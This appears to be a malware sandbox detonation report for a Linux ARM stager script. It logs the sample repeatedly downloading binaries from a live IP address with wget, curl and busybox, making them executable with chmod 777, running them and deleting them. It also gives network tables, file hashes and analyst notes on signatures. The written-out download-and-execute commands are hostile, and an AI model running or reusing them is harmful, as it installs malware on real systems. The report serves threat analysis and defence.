
/bin/chmod

[chmod 777 jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY

[./jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/rm

[rm jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/chmod

[chmod 777 iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY

[./iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/rm

[rm iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

Network

Country Destination Domain Proto
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
N/A 224.0.0.251:5353 udp
US 216.126.231.240:80 216.126.231.240 tcp
GB 89.187.167.39:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-20 04:21

Reported

2024-11-20 04:23

Platform

debian9-armhf-20240611-en

Max time kernel

65s

Max time network

68s

Command Line

[/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu N/A
N/A /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr N/A
N/A /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY N/A
N/A /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY N/A
N/A /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 N/A
N/A /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 N/A
N/A /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 N/A
N/A /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 N/A
N/A /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p N/A
N/A /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP N/A
N/A /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI N/A
N/A /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 N/A
N/A /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B N/A
N/A /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp N/A
N/A /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 N/A
N/A /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 N/A
N/A /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 N/A
N/A /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 N/A
N/A /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p N/A
N/A /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP N/A
N/A /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI N/A
N/A /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 N/A
N/A /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B N/A
N/A /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp N/A
N/A /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu N/A
N/A /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr N/A
N/A /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY N/A
N/A /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY N/A

Checks CPU configuration

antivm
Note: all 28 reads below come from the stock /usr/bin/curl that the stager spawns once per payload fetch (14 payload names, two passes through the loop), not from the sample or a dropped binary. Reading /proc/cpuinfo at startup is ordinary CPU-feature probing by the crypto libraries curl links against, so on its own this signature is weak evidence of sandbox evasion in this run.
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Note: as with the CPU check above, every row is attributed to /usr/bin/curl, two reads per curl invocation. /proc/self/auxv is consulted for hardware capability bits and /proc/sys/crypto/fips_enabled for the kernel FIPS-mode flag, both routine crypto-library initialisation in a stock curl; they are not discovery performed by the sample itself.
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /usr/bin/curl N/A
File opened for modification /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /usr/bin/curl N/A
File opened for modification /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /usr/bin/curl N/A
File opened for modification /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /usr/bin/curl N/A
File opened for modification /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /usr/bin/curl N/A
File opened for modification /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /usr/bin/curl N/A
File opened for modification /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /usr/bin/curl N/A
File opened for modification /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /usr/bin/curl N/A
File opened for modification /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /usr/bin/curl N/A
File opened for modification /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /usr/bin/curl N/A
File opened for modification /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /usr/bin/curl N/A
File opened for modification /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /usr/bin/curl N/A
File opened for modification /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /usr/bin/curl N/A
File opened for modification /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /usr/bin/curl N/A
File opened for modification /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /usr/bin/curl N/A
File opened for modification /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /usr/bin/curl N/A
File opened for modification /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /usr/bin/curl N/A
File opened for modification /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /usr/bin/curl N/A
File opened for modification /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /usr/bin/curl N/A
File opened for modification /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /usr/bin/curl N/A
File opened for modification /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /usr/bin/curl N/A
File opened for modification /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /usr/bin/curl N/A
File opened for modification /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /usr/bin/curl N/A
File opened for modification /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /usr/bin/curl N/A
File opened for modification /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /usr/bin/curl N/A
File opened for modification /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /usr/bin/curl N/A
File opened for modification /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /usr/bin/curl N/A
File opened for modification /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /usr/bin/curl N/A

Processes

/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN

[/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/chmod

[chmod 777 rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

[./rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/rm

[rm rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/wget

[wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/chmod

[chmod 777 qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr

[./qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/rm

[rm qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/wget

[wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/chmod

[chmod 777 jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY

[./jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/rm

[rm jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/chmod

[chmod 777 iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY

[./iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/rm

[rm iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/chmod

[chmod 777 cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4

[./cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/rm

[rm cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/wget

[wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/chmod

[chmod 777 IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4

[./IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/rm

[rm IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/wget

[wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/chmod

[chmod 777 Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0

[./Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/rm

[rm Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/wget

[wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/chmod

[chmod 777 Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2

[./Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/rm

[rm Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/wget

[wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/chmod

[chmod 777 ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p

[./ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/rm

[rm ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/wget

[wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/chmod

[chmod 777 FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP

[./FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/rm

[rm FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/wget

[wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/chmod

[chmod 777 DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI

[./DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/rm

[rm DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/wget

[wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/chmod

[chmod 777 BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2

[./BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/rm

[rm BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/wget

[wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/busybox

